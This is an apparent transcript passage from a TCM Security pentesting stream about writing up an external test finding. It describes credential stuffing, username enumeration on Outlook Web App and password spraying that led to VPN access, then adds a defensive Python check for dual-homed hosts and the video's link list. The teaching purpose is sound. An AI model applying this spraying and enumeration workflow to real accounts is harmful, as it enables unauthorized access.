so on top of that you come down here now and you have the external penetration test findings right so you've got the insufficient lockout policy so what it says is the company allowed us unlimited login attempts against their Outlook Web App Services this configuration allowed force and password guessing attacks in which we were able to gain access to their internal network the impact is critical because we did gain access we note the system that we gained access on and then we provide the references of the pages for this so obviously remote access and then unsuccessful login attempts automatic account lockout both the nist SP 800 policies and then you provide a proof of concept so first things first we gather historical breach data found in cadential dumps the data amounted to 868 total count credentials now obviously we can't put all those on one page would take up many pages so we're Justin say hey we'll throw them in the full findings that way you can review all the account credentials here you've got the usernames and passwords and then it's just a sample list of breach user credentials and then we're just going to go through the whole process we took those credentials performed a credential stuffing attack blah blah blah we weren't able to gain access with credential stuffing but outlook was providing enumeration through a username enumeration so got fail login but username is valid so using that we gathered valid user names and performed a password spraying attack we use Summer 2018 exclamation point a username return is successful you see successful login here and then we would say we let two valid credentials to gain access to the VPN there would be a picture here BPM access from there you would want to make a remediation recommendation so I like to put who what the vector is and then what the actions gonna be so who's gonna be the IT team if this was a web app you would say developer or if this was maybe more network side you would say network engineer 
and then you'd say you know the vector was done remotely so it's
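The dual-homed indicators walked through in the pivoting section (route print, arp -a, and netstat showing two networks on one box) can be turned into a quick check. That is just as useful on the defensive side: a host bridging two segments is exactly what a pivot needs, so knowing which machines are dual-homed, and which of them actually carry traffic on both sides, is worth tracking. Below is an added example, not code from the stream or from TCM Security. The route, ARP and netstat outputs it parses are constructed samples shaped like Windows output, using the lab's 192.168.200.x and 10.10.10.x ranges; they were not captured from a real machine, and the gateway and interface addresses are assumed.

```python
"""
Flag a dual-homed host from the same artifacts the stream looks at:
`route print`, `arp -a` and `netstat`.

Added example, not code from the stream or from TCM Security. The three
sample outputs below are constructed to look like what a Windows host with
NICs on 192.168.200.0/24 and 10.10.10.0/24 would print.
"""
import ipaddress
import re

# Constructed: the IPv4 section of `route print` on a dual-homed host.
SAMPLE_ROUTE_PRINT = """\
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0    192.168.200.2  192.168.200.129     25
       10.10.10.0    255.255.255.0         On-link      10.10.10.129    281
     10.10.10.129  255.255.255.255         On-link      10.10.10.129    281
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
    192.168.200.0    255.255.255.0         On-link   192.168.200.129    281
  192.168.200.129  255.255.255.255         On-link   192.168.200.129    281
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
===========================================================================
"""

# Constructed: `arp -a` on the same host, one block per interface.
SAMPLE_ARP = """\
Interface: 192.168.200.129 --- 0xb
  Internet Address      Physical Address      Type
  192.168.200.150       00-0c-29-11-22-33     dynamic

Interface: 10.10.10.129 --- 0x10
  Internet Address      Physical Address      Type
  10.10.10.128          00-0c-29-44-55-66     dynamic
"""

# Constructed: `netstat -an` rows showing the host talking on both networks.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    10.10.10.129:49712     10.10.10.128:443       ESTABLISHED
  TCP    192.168.200.129:49800  192.168.200.150:445    ESTABLISHED
  TCP    192.168.200.129:135    0.0.0.0:0              LISTENING
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
ROUTE_RE = re.compile(rf"^\s*{IPV4}\s+{IPV4}\s+(\S+)\s+{IPV4}\s+(\d+)\s*$")
ARP_IF_RE = re.compile(rf"^Interface:\s+{IPV4}")
NETSTAT_RE = re.compile(rf"^\s*TCP\s+{IPV4}:\d+\s+{IPV4}:\d+\s+ESTABLISHED")


def connected_networks(route_text):
    """Directly connected ('On-link') networks, minus loopback, multicast
    and the /32 host routes Windows adds for each interface address."""
    nets = set()
    for line in route_text.splitlines():
        m = ROUTE_RE.match(line)
        if not m:
            continue
        dest, mask, gateway, _iface, _metric = m.groups()
        if gateway != "On-link":
            continue
        net = ipaddress.IPv4Network(f"{dest}/{mask}", strict=False)
        if net.prefixlen == 32 or net.is_loopback or net.is_multicast:
            continue
        nets.add(net)
    return nets


def arp_interfaces(arp_text):
    """Interface addresses that own an ARP cache block."""
    return {m.group(1) for m in map(ARP_IF_RE.match, arp_text.splitlines()) if m}


def established_networks(netstat_text, nets):
    """Which of the connected networks carry an ESTABLISHED TCP session."""
    active = set()
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        local = ipaddress.IPv4Address(m.group(1))
        active.update(n for n in nets if local in n)
    return active


def assess(route_text, arp_text, netstat_text):
    """Return (dual_homed, networks, interfaces, networks_with_traffic)."""
    nets = connected_networks(route_text)
    ifaces = arp_interfaces(arp_text)
    busy = established_networks(netstat_text, nets)
    return (len(nets) > 1 or len(ifaces) > 1), nets, ifaces, busy


if __name__ == "__main__":
    dual, nets, ifaces, busy = assess(SAMPLE_ROUTE_PRINT, SAMPLE_ARP, SAMPLE_NETSTAT)
    print("dual-homed:", dual)
    print("connected networks:", sorted(map(str, nets)))
    print("arp interfaces:", sorted(ifaces))
    print("networks with established sessions:", sorted(map(str, busy)))
```

The routing table is the most reliable of the three signals, because a NIC shows up there even when it has never talked to anything; the ARP cache and netstat only tell you about recent neighbours and live sessions, which is why the check combines all three rather than trusting one.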
Original Description
Zero to Hero:
0:00 - Welcome
2:12 - Housekeeping
5:49 - File transfers
23:20 - Maintaining Access
29:55 - Pivoting
51:20 - Cleanup
53:20 - Legal/Documentation
1:11:22 - Career advice
❓Info❓
___________________________________________
Need a Pentest?: https://tcm-sec.com
Learn to Hack: https://academy.tcm-sec.com
📱Social Media📱
___________________________________________
Website: https://thecybermentor.com
Twitter: https://twitter.com/thecybermentor
Twitch: https://www.twitch.tv/thecybermentor
Discord: https://tcm-sec.com/discord
LinkedIn: https://www.linkedin.com/in/heathadams
Hacker Books:
Penetration Testing: A Hands-On Introduction to Hacking: https://amzn.to/31GN7iX
The Hacker Playbook 3: https://amzn.to/34XkIY2
Hacking: The Art of Exploitation: https://amzn.to/2VchDyL
The Web Application Hacker's Handbook: https://amzn.to/30Fj21S
Real-World Bug Hunting: A Field Guide to Web Hacking: https://amzn.to/2V9srOe
Social Engineering: The Science of Human Hacking: https://amzn.to/31HAmVx
Linux Basics for Hackers: https://amzn.to/34WvcXP
Python Crash Course, 2nd Edition: https://amzn.to/30gINu0
Violent Python: https://amzn.to/2QoGoJn
Black Hat Python: https://amzn.to/2V9GpQk